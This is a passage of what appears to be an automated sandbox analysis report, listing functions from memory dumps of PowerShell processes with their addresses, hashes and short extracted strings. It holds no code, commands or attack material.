                                                              • Opcode Fuzzy Hash: a0609deddf443807a764d5a328e7bb5c2be2860fcfed32f2a940d006a3cceb59
                                                              • Instruction Fuzzy Hash: D141177250DBC44FE7568B3998959523FF0EF57320B1906DFD088CB1A3D629AC46C7A2
                                                              Function 00007FFD343133B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3805013071.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd34310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction ID: 6df88ae468ce26ca9def13e3de26a6bc9de16f111e0ca8f96ba435a069a487ad
                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction Fuzzy Hash: 3301677125CB0C4FDB54EF0CE451AA9B7E0FB99364F10056EE58AC3661DA36E882CB46
                                                              Function 00007FFD34319CF8 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3805013071.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd34310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a4c65b12de779211279104a12410761cc03d71935386d4ab1b6955e890678f2
                                                              • Instruction ID: 46c93048f0bf20780bcef8bf9ac6fb3843e8cfbb037ed16c265565d960c7e3dc
                                                              • Opcode Fuzzy Hash: 2a4c65b12de779211279104a12410761cc03d71935386d4ab1b6955e890678f2
                                                              • Instruction Fuzzy Hash: D9F0B4318486894FDB46EF2888695D57FA0EF27310F0502DBE459C70A2DB759958CB92
                                                              Function 00007FFD343E414D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3819892256.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd343e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 245d386ccfaf920c233f6bd5e0a0ee65c230ca226738a4dc9d6e5f26992af341
                                                              • Instruction ID: 5d66339523db1a5d8907d903ac20b2b55dcb1cbbdf4df65d51dba854b3ce68f9
                                                              • Opcode Fuzzy Hash: 245d386ccfaf920c233f6bd5e0a0ee65c230ca226738a4dc9d6e5f26992af341
                                                              • Instruction Fuzzy Hash: B7F0B432B4D9454FDB64EB4CE4514D873E4EF6932071500B6E16DC7563CA3AEC80C744
                                                              Function 00007FFD343E4400 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3819892256.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd343e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c2045b896fc507fe52d31ad6f2a2e8894946cff7a22e0c32e6ef5dcf73c9dd7
                                                              • Instruction ID: d61a47c2946505537cfa7b15a464f9141505e5e75a8982d62f3b0e55b2917b47
                                                              • Opcode Fuzzy Hash: 9c2045b896fc507fe52d31ad6f2a2e8894946cff7a22e0c32e6ef5dcf73c9dd7
                                                              • Instruction Fuzzy Hash: 2EF05E32B4D9458FDB54EB4CE4914A877E0EF5A32475600B6E15DC7563DA29FC80CB50
                                                              Function 00007FFD343E41D1 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3819892256.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd343e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: 8f60f5cbbac4accfa65a4d130bee1d12fb7dacf82f4bf8f3ba8c916fb7c1a6a4
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 60E01232B4C4188FDA68EA0CE0909E973E1EBAD32171501B7D25EC7561C636EC919B80

                                                              Non-executed Functions

                                                              Function 00007FFD343184E3 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3805013071.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd34310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K_^$K_^$K_^$K_^$K_^
                                                              • API String ID: 0-3188868157
                                                              • Opcode ID: 6a4c4fdb2531fe31c2668c1b70369e61760f71f7955d4baf1cf582f7032581c9
                                                              • Instruction ID: c6e2122bc7cf6f8a27044f052a4d44cc71186382a6b5768508c77147d7c5e2fe
                                                              • Opcode Fuzzy Hash: 6a4c4fdb2531fe31c2668c1b70369e61760f71f7955d4baf1cf582f7032581c9
                                                              • Instruction Fuzzy Hash: E7318053E4E6D61BE757223858B60D62FD4EE5732470E01E6C1D8CB093EE1C6807E656

                                                              Executed Functions

                                                              Function 00007FFD343C6605 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (Ba4$(Ba4$(Ba4$(Ba4$(Ba4
                                                              • API String ID: 0-989513462
                                                              • Opcode ID: c3503480bfb954ef4cda8248492f8942bfc238709929390259080e178008e060
                                                              • Instruction ID: a311cf04b63e259529e739aa6330cbaa30d503984c540c2ae25fcdffb49ded83
                                                              • Opcode Fuzzy Hash: c3503480bfb954ef4cda8248492f8942bfc238709929390259080e178008e060
                                                              • Instruction Fuzzy Hash: E3D12632B8DB894FEBA5AB6848A55B97BD1EF56314F0801FED14DCB0A3D92CAC05C341
                                                              Function 00007FFD342F3428 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /&]
                                                              • API String ID: 0-1156444480
                                                              • Opcode ID: 1fa5a802227b811025e80260cb5d90767cf5430671e24b6055ff1cf13a05b1ac
                                                              • Instruction ID: cf0721459a2ff717d3f7b925761333ce1ab12df17d5167711ce0726ea817de3b
                                                              • Opcode Fuzzy Hash: 1fa5a802227b811025e80260cb5d90767cf5430671e24b6055ff1cf13a05b1ac
                                                              • Instruction Fuzzy Hash: FD31BF6BB0E7D28FE3674AA858B64E93FE0EF5322074910FBC5C0CB093D50A58079795
                                                              Function 00007FFD342FB72C Relevance: .3, Instructions: 310COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 953f403674771e174526bbd3f8eee71b079125360bcd1d4c3437c3bd54dc79ab
                                                              • Instruction ID: ffbe13d016cfc484fff70679ce470174aafbceb6de628ea42708d4dcf82db5fb
                                                              • Opcode Fuzzy Hash: 953f403674771e174526bbd3f8eee71b079125360bcd1d4c3437c3bd54dc79ab
                                                              • Instruction Fuzzy Hash: 46915D3160DB898FE759DF28C8956B57FE0EF97320F0441BED089C71A3DA29A846CB51
                                                              Function 00007FFD342F9728 Relevance: .2, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65905066d5daf357e67d3374b34cfacd721b352715c34e4dff49b2f4e46a22ea
                                                              • Instruction ID: fd818b3077f16e55496b374ff409b1aa7d4f80d426781c519a234088d2c8eaab
                                                              • Opcode Fuzzy Hash: 65905066d5daf357e67d3374b34cfacd721b352715c34e4dff49b2f4e46a22ea
                                                              • Instruction Fuzzy Hash: 1F415BB2A0DF844FDB589B1C98566A97BE0FF56310F0441AFE04893293DA39AC05CBC6
                                                              Function 00007FFD341DE380 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3807791873.00007FFD341DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd341dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9148a97ebe05a7a193e796de3e85a508f1da3ae7959a754ee562e7b599413d64
                                                              • Instruction ID: 0158868c6fa8e40adc49f01a8ae1008e472e0ae3a44890c9bae75649f72ff070
                                                              • Opcode Fuzzy Hash: 9148a97ebe05a7a193e796de3e85a508f1da3ae7959a754ee562e7b599413d64
                                                              • Instruction Fuzzy Hash: 5C4136B190EFC44FE7568B2998919623FF0EF53315B1505EFD08CCB1A3D629A806C792
                                                              Function 00007FFD342F33B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction ID: d76700d8120413915679eb5528f3a1d245f28cc21299573542b580b01c5a2b0a
                                                              • Opcode Fuzzy Hash: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction Fuzzy Hash: 3F01677121CB0C8FD754EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E882CB45
                                                              Function 00007FFD342F9CF8 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0aabde7767a203c39eebf759505f812f55ef01f06d96a3d1f19fb904cb34d10
                                                              • Instruction ID: e52ebfb15d5328e62513669527a90f7137b9e674f4d496fe8015b56371103214
                                                              • Opcode Fuzzy Hash: e0aabde7767a203c39eebf759505f812f55ef01f06d96a3d1f19fb904cb34d10
                                                              • Instruction Fuzzy Hash: 06F0BB358086898FEB46EF2888595E57FA0EF17310F150297D458C70A2DB659558CF92
                                                              Function 00007FFD343C414D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction ID: 4f891ce5be974d1c8e76aeecf66fc7e693b7f92fbc2f1447b9f64d71c7487220
                                                              • Opcode Fuzzy Hash: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction Fuzzy Hash: D5F05432B4C9554FD765FB4CE45149873E5EF6532071600B6E16DC7563CA39EC41C744
                                                              Function 00007FFD343C4400 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction ID: 0867862a54e442d3eb058707641e8607b0ce4af0ba291441b5c441847efd4f98
                                                              • Opcode Fuzzy Hash: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction Fuzzy Hash: 82F05E32B4C9458FDB54EB4CE4914A877E0EF5632476600B6E15EC7563DA29EC40C750
                                                              Function 00007FFD343C41D1 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: c8224e7659732bfc08a244a07766d2e50e2587e028fc07878611f3a88b565ce1
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 64E0483274C8148FD668EA0CE1909E973E1EFA933171101B7D25FC7561C635EC51DB80

                                                              Non-executed Functions

                                                              Function 00007FFD342F8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                              • API String ID: 0-1500707516
                                                              • Opcode ID: 6dd668553718fcedfa963d1fabb31e8a4bd66b918e9bc6edfbce442f26bca8ea
                                                              • Instruction ID: 99106cc3671debc43ddf3dafc2ebd7206e58cb3a0f9f8dd904152b8b0cd03c6a
                                                              • Opcode Fuzzy Hash: 6dd668553718fcedfa963d1fabb31e8a4bd66b918e9bc6edfbce442f26bca8ea
                                                              • Instruction Fuzzy Hash: 612132773084669ED32276ADB8149DD7398CFA427638947B3E268DB543ED18A0CB86C0
                                                              Function 00007FFD342F89FA Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^
                                                              • API String ID: 0-1397233021
                                                              • Opcode ID: dcae4a861bb0c0e15c2426225222a32611d1d525e9c3792527a0e02f1d5b8ec5
                                                              • Instruction ID: 26d3363f52af91a55dde57a45c8fdc17cb172ea232f64effac587f8e902f86ba
                                                              • Opcode Fuzzy Hash: dcae4a861bb0c0e15c2426225222a32611d1d525e9c3792527a0e02f1d5b8ec5
                                                              • Instruction Fuzzy Hash: 8631A8A7B0E6C29BE35742294CB6096BFD0EF5331878A02F5C5D4DA083FE1E58176152

                                                              Executed Functions

                                                              Function 00007FFD342FA2FA Relevance: .4, Instructions: 377COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3762697264.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42cc1c96bc65fa7f199768bcb00055b7bda7a9bb67c9ca0e6ee5e04d485dd209
                                                              • Instruction ID: 0fbb5783b51425db78810f281a5ac03bb37bed089ff4a137b4c753c90e45642b
                                                              • Opcode Fuzzy Hash: 42cc1c96bc65fa7f199768bcb00055b7bda7a9bb67c9ca0e6ee5e04d485dd209
                                                              • Instruction Fuzzy Hash: 0EB17132A0CA898FD759DB5C989A5E97BE0FF57320F4402AFC048D7153EE296806C792
                                                              Function 00007FFD343C6605 Relevance: 6.7, Strings: 5, Instructions: 438COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3779760541.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (Ba4$(Ba4$(Ba4$(Ba4$(Ba4
                                                              • API String ID: 0-989513462
                                                              • Opcode ID: b8a9624380d70a1f9e0aa8773e2ca5b9c1516f38018f973324e2880651b28fb7
                                                              • Instruction ID: 605e9fb8a8baebfbb4db5047bcf2a1bc1585aa1315003c5986d90cd87947a329
                                                              • Opcode Fuzzy Hash: b8a9624380d70a1f9e0aa8773e2ca5b9c1516f38018f973324e2880651b28fb7
                                                              • Instruction Fuzzy Hash: E5D12532B8DB894FEBA5AB6848A55B97BD1EF56314B0801FED14DCB0A3D92CAC05C341
                                                              Function 00007FFD342F9738 Relevance: .1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3762697264.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8180778b7c01cc90e610143d54be2ae15b6ddfce5007f61331ea641659eb9e0b
                                                              • Instruction ID: 518cd6f59d6937cb96d8f43be6d4eafdf86a94b261160aa22966392184992cda
                                                              • Opcode Fuzzy Hash: 8180778b7c01cc90e610143d54be2ae15b6ddfce5007f61331ea641659eb9e0b
                                                              • Instruction Fuzzy Hash: AC412771A0DF888FDB589B1C9C5A2A97BE0FF56310F44426FE449D3192DA34A815CB86
                                                              Function 00007FFD341DE29F Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3746216692.00007FFD341DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd341dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbdf06bba75cedc4701b150d738ce771ea791dea381e5f9dc62f6e4d78856ac2
                                                              • Instruction ID: 5ae6be08f096dcfb3a1102aca2d0fae9107a7764eda91ac2b14e6bcfcd1e457e
                                                              • Opcode Fuzzy Hash: dbdf06bba75cedc4701b150d738ce771ea791dea381e5f9dc62f6e4d78856ac2
                                                              • Instruction Fuzzy Hash: 5141F7B290EFC44FE7668B3898919623FF0EF57315B1505EFD088CB1A7D619A806C792
                                                              Function 00007FFD342F33B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3762697264.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction ID: d76700d8120413915679eb5528f3a1d245f28cc21299573542b580b01c5a2b0a
                                                              • Opcode Fuzzy Hash: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction Fuzzy Hash: 3F01677121CB0C8FD754EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E882CB45
                                                              Function 00007FFD342F9CF8 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3762697264.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0aabde7767a203c39eebf759505f812f55ef01f06d96a3d1f19fb904cb34d10
                                                              • Instruction ID: e52ebfb15d5328e62513669527a90f7137b9e674f4d496fe8015b56371103214
                                                              • Opcode Fuzzy Hash: e0aabde7767a203c39eebf759505f812f55ef01f06d96a3d1f19fb904cb34d10
                                                              • Instruction Fuzzy Hash: 06F0BB358086898FEB46EF2888595E57FA0EF17310F150297D458C70A2DB659558CF92
                                                              Function 00007FFD343C414D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3779760541.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction ID: 4f891ce5be974d1c8e76aeecf66fc7e693b7f92fbc2f1447b9f64d71c7487220
                                                              • Opcode Fuzzy Hash: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction Fuzzy Hash: D5F05432B4C9554FD765FB4CE45149873E5EF6532071600B6E16DC7563CA39EC41C744
                                                              Function 00007FFD343C4400 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3779760541.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction ID: 0867862a54e442d3eb058707641e8607b0ce4af0ba291441b5c441847efd4f98
                                                              • Opcode Fuzzy Hash: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction Fuzzy Hash: 82F05E32B4C9458FDB54EB4CE4914A877E0EF5632476600B6E15EC7563DA29EC40C750
                                                              Function 00007FFD343C41D1 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3779760541.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: c8224e7659732bfc08a244a07766d2e50e2587e028fc07878611f3a88b565ce1
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 64E0483274C8148FD668EA0CE1909E973E1EFA933171101B7D25FC7561C635EC51DB80

                                                              Non-executed Functions

                                                              Function 00007FFD342F84F2 Relevance: 11.5, Strings: 9, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3762697264.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                              • API String ID: 0-2452815496
                                                              • Opcode ID: 613520cdf325ead913bec09f80286c182412fec01381004e93712e1b4f1c5f37
                                                              • Instruction ID: 44553fe7a04d2a75a57234157f0d677d2f82ddb43bbf55b235d41042d51ec8a9
                                                              • Opcode Fuzzy Hash: 613520cdf325ead913bec09f80286c182412fec01381004e93712e1b4f1c5f37
                                                              • Instruction Fuzzy Hash: C6910C57E0EAC29BE353462918B61D57FD0EF53314B8E05F6CAD4DB083EE1E28176252
                                                              Function 00007FFD342F8BD3 Relevance: 7.6, Strings: 6, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000020.00000002.3762697264.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_32_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^?$M_^@$M_^K$M_^N$M_^T$M_^Y
                                                              • API String ID: 0-2127400921
                                                              • Opcode ID: f970ea79ab59952bf84854807fe2f63024dde8e7f50484e41b8e2c5c23922b56
                                                              • Instruction ID: 592577a42109178649767d21f6daebcc6e9cab9562ff4bc9aef0950fd6b56835
                                                              • Opcode Fuzzy Hash: f970ea79ab59952bf84854807fe2f63024dde8e7f50484e41b8e2c5c23922b56
                                                              • Instruction Fuzzy Hash: 7821016770882A8AD32236BDB8129ED7794DFA523538503F2E168DF193ED15A4CB86C0

                                                              Executed Functions

                                                              Function 00007FFD3430BDA9 Relevance: 3.0, Strings: 2, Instructions: 506COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P4V4$p3V4
                                                              • API String ID: 0-4264881567
                                                              • Opcode ID: bec7a7a16b1869761dc287d3b8ba4ccee0c7901e89d933439d3502f9c103e843
                                                              • Instruction ID: de10637e659e2c584c59b9ce3fc318ae8fe85a36e9f652089b7464baacf82d86
                                                              • Opcode Fuzzy Hash: bec7a7a16b1869761dc287d3b8ba4ccee0c7901e89d933439d3502f9c103e843
                                                              • Instruction Fuzzy Hash: F7F1A331A18A4D8FDF98EF5CC495AA977E1FF69314F14426AD40ED7296CA38E841CB80
